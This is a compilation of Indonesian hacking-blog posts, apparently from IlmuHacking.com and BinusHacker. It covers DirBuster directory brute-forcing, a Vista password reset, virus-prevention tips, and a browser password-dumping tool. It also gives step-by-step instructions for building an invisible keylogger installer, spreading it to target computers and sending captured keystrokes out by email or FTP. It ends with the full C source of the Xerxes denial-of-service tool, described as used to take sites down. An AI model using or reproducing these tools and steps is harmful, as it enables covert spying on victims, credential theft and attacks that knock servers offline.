Salah satu contoh log file yang biasa ditemukan di web adalah WS_FTP.LOG, file ini dibuat oleh program WS_FTP, yaitu FTP Client. Setiap kali memakai program ini untuk upload ke web anda, WS_FTP akan otomatis memasukkan file WS_FTP.LOG ke dalam folder website anda. Dalam file WS_FTP.LOG ini seorang hacker bisa mendapatkan banyak informasi sensitif: antara lain IP address web server anda (banyak web yang menyembunyikan IP address sebenarnya dibalik NAT), full path lokasi document root web anda, username account hosting anda (bila dalam full path mengandung nama seperti /home/username/…./).
WS_FTP.LOG juga bisa membocorkan isi sebuah direktori bila anda sudah mematikan fitur “Directory Indexing” atau membuat file index.html kosong. Seorang hacker yang tidak bisa melihat isi direktori karena directory index dimatikan atau ada file index.html kosong, bisa mencoba membuka WS_FTP.LOG di direktori itu. Bila ternyata file WS_FTP.LOG ada, maka file log itu akan membocorkan isi file dalam direktori tersebut.
Pesan error di atas umumnya dijumpai pada direktori yang ada, tapi directory indexing tidak diaktifkan, sehingga anda harus menebak nama file yang ada di direktori tersebut. Bila directory indexing diaktifkan, maka anda akan menemukan halaman dengan title “Index of /”.
  • Versi Lama
Terkadang ketika sebuah website diupdate ke versi baru, file-file script lama disimpan dalam satu direktori bernama oldversion, version1 dan versi barunya dalam direktori /new/ atau /ver2/ atau /beta/. Menemukan beragam versi suatu web adalah kesempatan emas untuk menemukan celah keamanan karena biasanya web versi terbarunya memang tidak mengandung kelemahan, namun bila kita berhasil menemukan versi lamanya, akan ditemukan banyak celah keamanan.
Saya pernah menemukan sebuah website yang securitynya bagus, saya tidak menemukan vulnerability di sana, namun ternyata dia lupa membuang versi lama dari web tersebut. Namun ternyata web versi lama yang mengandung banyak bug dari SQL injection sampai local file injection masih bisa diakses di direktori lain. Walaupun web versi terbaru securitynya bagus, namun jadi tidak berarti apa-apa karena hacker bisa menyerang dari web versi lamanya.
Berburu Direktori dan File Sensitif
Nama direktori atau file bisa ditemukan dengan 2 cara:
  • Crawling
Crawling ini adalah cara yang dipakai oleh search engine untuk mendapatkan isi website anda.  Ini adalah cara yang “sopan”, karena kita hanya mencari apa yang memang disediakan oleh pemilik webnya. Search engine crawling akan mengikuti direktori apa yang boleh dan apa yang tidak boleh diambil dalam file /robots.txt. Jadi bila ada direktori sensitif yang bisa di-search di Google, maka itu terjadi karena di suatu situs ada pointer ke obyek itu berupa link. Bila di seluruh jagat internet ini tidak ada satupun link ke direktori itu, maka tidak mungkin direktori itu muncul di Google.
Kita bisa memanfaatkan Google Hacking untuk mencari direktori sensitif yang sengaja atau tidak sengaja ter-index oleh Google. Kita juga bisa membuat script atau memakai program semacam wget untuk melakukan crawling website  (tidak memanfaatkan Google index). Menjalankan crawler sendiri terkadang diperlukan bila kita ingin melakukan crawling direktori yang search engine dilarang untuk masuk (diblacklist di /robots.txt).
  • Guessing
Bila dengan cara sopan tidak mendapatkan direktori sensitif, maka kita terpaksa pakai cara “kasar”. Mendapatkan direktori sensitif dengan cara ini sama dengan menebak password. Ada dua cara yang bisa dipakai:
  1. Pure Brute Force Attack
  2. Cara ini adalah cara yang paling kasar. Kita mencoba semua kemungkinan kata yang muncul dari huruf , angka dan karakter lain sebagai nama direktori atau nama file. Contoh: request /aa/, lalu /ab/, lalu /ac/, lalu /ad/, demikian seterusnya sampai semua kemungkinan yang ada dicoba. Cara ini membutuhkan waktu yang sangat lama, jadi kurang efektif. Tapi kelebihannya adalah tidak ada direktori yang lolos, karena semua kemungkinan akan dicoba.
  3. Dictionary Attack
  4. Ini adalah cara yang lebih sopan dibanding pure brute force. Kita menggunakan kamus, yaitu kumpulan nama yang akan kita pakai untuk request ke web server. Efektif tidaknya cara ini tergantung dari bagaimana kualitas kamus yang dipakai. Semakin baik kualitas kamusnya, semakin besar kemungkinan berhasil mendapatkan direktori sensitif. Kamus yang baik adalah kamus berisi kata yang memang benar-benar pernah dipakai untuk nama direktori, jadi bukan nama fiktif atau karangan.
DirBuster dari OWASP
Dalam artikel ini saya akan menggunakan tools gratisan, DirBuster yang dibuat oleh OWASP (Open Web Application Security Project), sebuah kelompok non-profit yang berfokus pada keamanan web. Seperti yang sudah saya katakan sebelumnya, kekuatan tools semacam ini tergantung pada kualtias kamus yang dimilikinya.
DirBuster memiliki kamus yang sangat lengkap, bukan nama fiktif yang tidak pernah dipakai, tapi memang benar-benar nama yang pernah dipakai sebagai nama direktori. Kumpulan nama ini didapatkan dari internet dengan cara melakukan crawling terhadap situs-situs internet lalu mengelompokkannya. Kumpulan nama yang dipakai minimal 3 situs berbeda ditaruh di file dengan akhiran small.txt, kumpulan nama yang dipakai minimal 2 situs berbeda ditaruh di file dengan akhiran medium.txt, dan semua nama yang ditemukan ditaruh dalam file berakhiran big.txt.
Bila anda membutuhkan daftar nama direktori saja untuk dipakai di program lain, anda juga bisa mendownload kamusnya saja tanpa harus mendownload DirBuster.
Tools ini sangat mudah digunakan, jadi silakan saja langsung download DirBuster. Sebelumnya pastikan dulu komputer anda sudah terinstall Java, karena tools ini dibuat dengan Java.
Scanning Type
Ada dua jenis scanning yang bisa dilakukan, pure brute force atau dictionary based attack. Bila anda memilih memakai teknik pure brute force, maka anda harus menentukan character set (kumpulan karakter) yang akan dijadikan nama direktori dan tentukan juga panjang minimal dan maksimalnya. Semakin besar populasi dari character set yang anda pilih dan semakin panjang max length yang anda pilih, semakin besar kumpulan kata yang dihasilkan, itu artinya dibutuhkan waktu yang semakin lama untuk mencoba semuanya. Gambar di bawah ini adalah screenshot ketika memilih pure brute force.
Bila memilih list based brute force, maka kita harus memilih file berisi daftar nama direktori. DirBuster sudah menyediakan banyak dictionary yang bisa dipilih sesuai kebutuhan:
  • directory-list-2.3-small.txt  (87650 words) : Minimal dipakai di 3 situs berbeda.
  • directory-list-2.3-medium.txt  (220546 words) : Minimal dipakai di 2 situs berbeda.
  • directory-list-2.3-big.txt  (1273819 words) : Minimal pernah dipakai.
  • directory-list-lowercase-2.3-small.txt  (81629 words) : Versi case insensitive dari directory-list-2.3-small.txt
  • directory-list-lowercase-2.3-medium.txt  (207629 words) : Versi case insensitive dari directory-list-2.3-medium.txt
  • directory-list-lowercase-2.3-big.txt  (1185240 words) : Versi case insensitive dari directory-list-2.3-big.txt
  • directory-list-1.0.txt  (141694 words)  : Daftar awalnya, tidak terurut
  • apache-user-enum-1.0.txt  (8916 usernames) : Dipakai untuk user enumeration, mendapatkan valid username di sebuah server
  • apache-user-enum-2.0.txt  (10341 usernames) : Dipakai untuk user enumeration
Dalam list yang disediakan DirBuster juga menyediakan daftar username yang dipakai untuk user enumeration, yaitu mendapatkan nama user yang valid di sebuah server. Dalam web server Apache yang mengaktifkan mod_userdir, bisa dilakukan user enumeration dengan cara menggunakan ~namauser sebagai nama direktori.
Gambar di bawah ini adalah screenshot ketika kita memilih menggunakan dictionary attack.
Starting Options
Pilihan lain yang harus dipilih adalah starting options, yaitu di mana titik mulainya DirBuster mencari direktori. Pilihannya adalah standard start point, atau URL Fuzz. Standard start point adalah pilihan yang paling banyak digunakan karena pilihan ini berarti kita meminta DirBuster untuk menggunakan nama direktori sebagai titik awal.
Pilihan yang ada ketika kita memilih Standard Start Point adalah checkbox Brute Force Dirs yang bisa dimatikan bila kita tidak ingin ingin membrute Direktori. Brute Force Files bisa dimatikan bila kita tidak ingin mencari file. Dua pilihan tersebut bisa diatur sesuai kebutuhan, apakah ingin mencari direktori dan nama file, atau direktori saja, atau nama file saja.
Pilihan File extention bisa diisi dengan ekstensi file yang ingin dicari, misalnya bisa kita isi dengan php, zip, gz, tar.gz. Namun bila kita tidak ingin menggunakan ekstensi, kita bisa centang pilihan Use Blank Extention.
Pilihan Be Recursive digunakan untuk membuat DirBuster melakukan pencarian secara mendalam (Deep First Search), yaitu mencari subdirektori dalam sebuah direktori, mencari sub-subdirektori dalam subdirektori dan seterusnya sampai kedalaman tertentu.
Ada kalanya kita harus membrute force nama direktori yang merupakan bagian dari parameter URL. Dalam kasus seperti itu kita bisa memakai pilihan URL Fuzz. Salah satu contoh kasusnya adalah ketika kita ingin melakukan scanning melalui sebuah web based proxy seperti PHPProxy.
Ketika kita ingin scanning website internal dengan IP address private dari website public yang sudah berhasil kita susupi, kita bisa gunakan PHProxy. URL PHProxy biasanya berbentuk http://somewebsite/myproxy/?q=http://situstarget/{dir}. Dalam kasus seperti ini, pilihan URL Fuzz bisa sangat berguna. Gambar di bawah ini menunjukkan skenario tersebut. Setelah seorang hacker berhasil menguasai web server public, dia akan mengupload web based proxy seperti PHProxy. Dengan proxy tersebut hacker bisa melebarkan serangannya ke arah dalam dengan menyerang web server internal yang tidak bisa dijangkau dari internet.
Walaupun tools ini sangat sederhana, tapi jangan remehkan keampuhannya. Silakan coba saja sendiri, mungkin nanti anda akan terkejut melihat banyaknya webmaster yang sembrono menaruh file/direktori sensitif di websitenya.

Sumber IlmuHacking.com

Menggunakan Keylogger Sebagai Tool Hack

Artikel ini tidak bermaksud untuk memberitahukan kepada kalian bagaimana cara melakukan tindakan hacking atau menganjurkan kalian untuk melakukan tindakan hacking, hanya untuk berbagi pengalaman dan sharing.
Pertama yang harus kalian lakukan adalah mendapatkan software yang bernama keylogger merupakan tool yang merekam semua aktifitas pada keyboard target komputer.
Download softwarenya disini : http://www.ziddu.com/download/3170646/Perfect.Keylogger.v1.6.5.0.zip.html
Kedua adalah melakukan setup pada software tersebut untuk mendapatkan log file yang akan dikirim kepada email yang tersetup pada pilih option pada software ini.
Keterangan Langkah² Menjalankan Keylogger :
1. Email penerima log attachment -> Ini di isi dengan email anda / email penerima hasil dari logging, misal: emailsaya@gmail.com
2. SMTP Server -> Ini diisi dengan SMTP Server yang anda punya, misal: smtp.serversaya.net.id / smtp.indo.net.id
3. Username SMPT server -> Ini diisi dengan username SMTP yang anda dapat dari username SMTP Server, misal: smtpsaya@serversaya.net.id / smtpsaya@indo.net.id
4. Password SMPT server -> Password SMTP, di isi dengan password SMTP Anda :)
Ketiga lakukan remote installation dengan mengcompile file .exe bisa software apa saja.
Untuk melakukan compile remote installation sangat mudah kita dipandu dengan menu Wizard seperti pada gambar diatas.
Terakhir adalah menyebarkan file .exe tersebut kepada komputer target terserah untuk menyebarkannya lakukan dengan cara kalian bagamana agar target mau melakukan install software yang sudah kalian compile. Ini cara hack yang bener benar terbukti.
Sekali terinstal maka semua aktifitas komputer target akan terekam dan tidak terdeteksi oleh Anti virus. Software ini tidak gue complie jadi masih fresh.
Artikel Posted By Yohan – Approved By BinusHacker Team
Artikel Ini  Diupdate Oleh BinusHacker Team – Tambahan Cara Instlall Ardamax Keylogger Buat Kalian (^_^)

1. Setelah menginstal program, ketika menjalankan untuk pertama kalinya akan diminta untuk memasukkan nama dan nomor serial key yang udah include didalam folder ketika di download. Silakan dilihat didalamnya.


2. Setelah mengaktifkannya, langsung dibuka aja. Ketika Anda akan membukanya, Anda akan melihat icon ditambahkan ke dalam sistem tray. Langsung klik ajah.
3511692621 cbd1d6bed1 Tutorial On Ardamax 3.0 Keyloggers
3. Sekarang mari kita klik kanan pada ikon & lalu klik “Remote Installation”.

4. Klik Next. Pada option “Additional components” pilih “Log viewer”.
5. Next lanjut kepada “Invisibility” options. Centangin ajah semuanyabiar mantep Invisibilitynya.
6. Next option “Security”, gak perlu sih, langsung NEXT lagi ajah.
7. Next option “Web Update”, Jangan dicentangin semuanya / terserah sih maunya gimana, yg penting baca dulu perintah & maksudnya, kemudian klik NEXT.
8. Kemudian akan muncul “Options” page.  Pilih seperti contoh dibawah ini.
9. Cara dibawah ini harus dipastikan berjalan, klo gak jalan keyloggernya gak akan berhasil. Wajib diperhatikan!!
Pilihlah sesuai dengan keinginan anda. Diharapkan anda menyeting dengan benar :)
10. Isilah username & password FTP Account yang anda miliki. Seperti penjelasan sebelumnya di tahap awal cara setting FTP.
11. Klik test, untuk melakukan test koneksi, apabila berhasil. Maka dipastikan keylogger anda berjalan dengan baik.
12. Next ke “control” page, aturnya sesuai keinginan dah. Klo gak tau ya lewatin ajah.
13. Next ke “Screen shot”, Klik Next ajah klo sudah tau artinya itu mah.
14. Silakan pilih file untuk generate keylogger file.
15. Selesai!
16. Silakan gunakan dengan baik :)
Catatan: Deactivate sementara anti virus anda, kadang ini terdeteksi sebagai admx virus / keylogger. Enjoy & Eat It!
DOWNLOAD ARDAMAX v3.0 Klick Disini + Include Serial Key
BINUSHACKER TEAM UPDATED:
Bermacam-macam keylogger yang bisa digunakan
KLIK DISINI UNTUK DOWNLOAD BERBAGAI JENIS KEYLOGGER
Enjoy.. Have A Nice Explore & Experience!
Special Thanks To Master UtuH atas Pencerahannya :)
Youre great man! Viva BinusHacker Family

BinusHacker

Hack Login Windows Vista

Masalah hack-menghack biasanya mengasyikkan, betul? Tapi bukan untuk tujuan buruk loh. Mungkin suatu saat anda akan membutuhkan teknik ini. Yaitu teknik Login Windows Vista tanpa password. Jika anda lupa password account windows vista anda, jangan panik, buka aja blog ini.

Gimana sih caranya masuk login windows vista tanpa password? Nah untuk segera memulai, siapkan dulu DVD Windows Vista-nya. Punya anda windows vista asli kan? Bukan DVD Windows Vista Bajakan yang gratis? hehe.


1. Booting komputer anda dengan DVD Windows Vista
2. Setelah popup Install Windows Vista muncul. Klik Repair Your Computer, di sebelah kiri bawah.

3. Kemudian dialog box System Recovery Options akan muncul. Ada beberapa opsi yang berhubungan dengan repair windows vista, tampilannya terlihat seperti recovery console windows xp. Kemudian klik Command Prompt:

4. Pada Vista Command Prompt, ketik 'mmc.exe' dan tekan 'ENTER' untuk memunculkan Microsoft Management Console. Microsoft Management Console mengatur account user Individual and Group.

5. Klik di 'File' > 'Add / Remove Snap-in', cari dah pilih 'Local Users and Groups' dan klik tombol 'Add' untuk menambahkannya di panel kanan.

6. Klik tombol OK dan kembali ke windows MMC.

Di dalam panel kiri Console, klik ganda 'Local Users and Groups' yang sudah kita tambahkan tadi. Klik folder 'Users', cari dan klik kanan target login account Vista yang anda temukan di panel kanan.

Dan sekarang anda tau apa yang harus dilakukan. Pilih set password dari menu klik kanan untuk mengeset password baru anda.

Menendang Virus Ravmov

Jika sewaktu anda melakukan klik kanan muncul menu-menu berkarakter aneh atau berbahasa cina, curigailah komputer anda terserang virus ravmon. Virus ravmon ini menyerang komputer dengan beberapa kemampuan.

Jika anda terserang virus ravmon ini, kemungkinan besar komputer anda akan mengalami hal-hal berikut:
1. Task Manager, Registry Editor, dan Command Prompt menjadi tidak bisa diakses.
2. Jika melakukan klik kanan muncul menu berkarakter aneh atau berbahasa cina.


3. Komputer suka shutdown sendiri.
4. Folder Options menghilang.
5. Opsi Show Hide Files and Folders tidak berfungsi.

Sekarang, bagaimana cara menghapus virus ravmon ini? Berikut cara singkatnya.

Untuk menghapus virus ravmon kita bisa menggunakan tool yang sudah ada. Yaitu Smart Virus Remover. Anda bisa mendownloadnya di sini.

Semoga dengan tool tadi virus ravmon yang bersemayam di komputer anda akan pergi.

Mencegah Virus Menular

Salah satu teknik penyebaran virus yang paling cepat saat ini yaitu dengan melalu Flash disk. Penyebaran melalui USB Flash disk biasanya menggunakan fitur autorun atau biasa disebut juga dengan autoplay.

Jika komputer anda termasuk yang sering kedatangan tamu USB Flash disk, mungkin cara berikut bisa dicoba. Cara berikut ini akan mengurangi potensi komputer anda terserang virus melalui Flash disk.

Tentunya tindakan yang bijak bukan melalukan tindak preventif sebelum komputer anda terkena penyakit. Ya sama lah, mencegah lebih baik dari pada mengobati, hehe.


Nah, langsung aja ya. Berikut cara mencegah penularan virus komputer dengan menonaktifkan fitur autorun atau autoplay.
1. Bukalah kotak dialoh run. Bisa melalui Start -> Run atau tekan tombol Windows di keyboard, tahan kemudian tekan tombol R (Windows+R).
2. Setelah kotak dialog run muncul, ketik gpedit.msc, tekan OK.

3. Kemudian akan muncul window Group Policy seperti ini.

4. Masukkah ke folder Computer Configuration > Administrative Templates > System.
5. Klik ganda pada Turn Off Autoplay.
6. Kemudian pada window Turn Off Autoplay Properties pilih opsi Enabled. Pada pilihan Turn off Autoplay on pilih All drives. Klik Ok.

7. Langkah selanjutnya, buka folder User Configuration > Administrative Templates > System. Kemudian lakukan seperti langkah 5-6.

Semoga dengan cara ini, frekuensi komputer anda terkena virus dapat berkurang jauh. :)
 
 
Tips Trik

Facebook Password Decryptor

FacebookPasswordDecryptor
Banner
FacebookPasswordDecryptor adalah perangkat lunak GRATIS untuk segera memulihkan password account yang disimpan Facebook disimpan oleh web browser populer dan rasul. Sebagian besar aplikasi penyimpanan password Login untuk mencegah hassale dari masukan password setiap pengguna.
Features of FacebookPasswordDecryptor
Facebook Password Decryptor men-support recpvery dari password account yang tersimpan Facebook dari sebagian besar browser internet yang populer. Berikut adalah daftar lengkap aplikasi yang didukung.
  • Internet Explorer
  • Firefox
  • Google Chrome
  • Opera Browser
  • Apple Safari
  • Flock Browser
  • Paltalk Messenger
  • Miranda Messenger
Installing FacebookPasswordDecryptor
Meskipun FacebookPasswordDecryptor adalah tools yang portable, tapi tools ini diharuskan untuk menginstall dengan Installer sehingga Anda dapat menginstalnya secara lokal pada sistem anda untuk penggunaan reguler. Agan” dapat menggunakan Uninstaller untuk menghapus perangkat lunak dari sistem.

Installer
Using FacebookPasswordDecryptor
Using GUI Version
  • Jalankan Facebook Password Decryptor
  • Kemudian klik “Start Recovery” , maka semua password login facebook dari berbagai aplikasi yang digunakan akan ter- recover dengan sendirinya (screen 1).
  • Default password tidak ditampilkan untuk alasan keamanan karena data sensitif. Namun anda dapat mengklik tombol on’Show Password ‘di bagian bawah untuk melihat password tersebut.
  • Setelah itu anda dapat menyimpan semua recovery password dalam kedalam format txt maupun Html dengan memilih “export to text” atau “export to Html”.

Using Command-line Version
FacebookPasswordDecryptor.exe  “<output_file path>”
Contoh nye:
//Writes recovered password to text file in current directory
FacebookPasswordDecryptor.exe  output.txt
//Writes recovered password to HTML file in current directory
FacebookPasswordDecryptor.exe  output.html
//Writes recovered password to TEXT file
FacebookPasswordDecryptor.exe  “c:\my test\passlist”
Secara otomatis mendeteksi mode (teks atau html) dengan menggunakan ekstensi dari file yang ditentukan (txt atau html). Default (atau jika tidak ada ekstensi yang ditentukan) menggunakan mode TEXT (screen 2).
Screenshot hasil recover password facebook oleh Facebook Password Decryptor:
Main

Screenshot perintah dalam command line:
Command Line

List export data dalam bentuk Html menggunakan Facebook Password Decrypter
Export
Download : http://securityxploded.com/getfile_plus.php?id=2222
Ane baru pertama kali nulis artikel beginian gan hehehee… maaf kalo ada salah” kata ya…. By Dhannish Thinker

BinusHacker

Xerxes DOS Tools

DDOS Tools: Xerxes DOS Tools

23 July 2011
Penulis:   · Kategori Artikel: Coding
BINUS HACKER Binus Hacker Is Not Criminal Banner



223
 
16
 
239
share

Greeting Guest, Anonymous & BinusHacker Family
Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester untuk takedown situs-situs, langsung aja ini source codenya:
/* XerXes – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
//    fprintf(stderr, “[Connecting -> %s:%s\n", host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n”, host, port);
    return sock;
}
void broke(int s) {
    // do nothing
}
#define CONNECTIONS 8
#define THREADS 48
void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], “\0″, 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
//                fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
            fprintf(stderr, “[%i: Voly Sent]\n”, id);
        }
        fprintf(stderr, “[%i: Voly Sent]\n”, id);
        usleep(300000);
    }
}
void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050″);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
        r=write(socket, “signal NEWNYM\n\x00″, 16);
        fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r);
        usleep(300000);
    }
}
int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}

Video Xerxes Dos


Semoga informasi ini bermanfaat sebagai pembelajaran yang lebih baik.
Video Disini

BinusHacker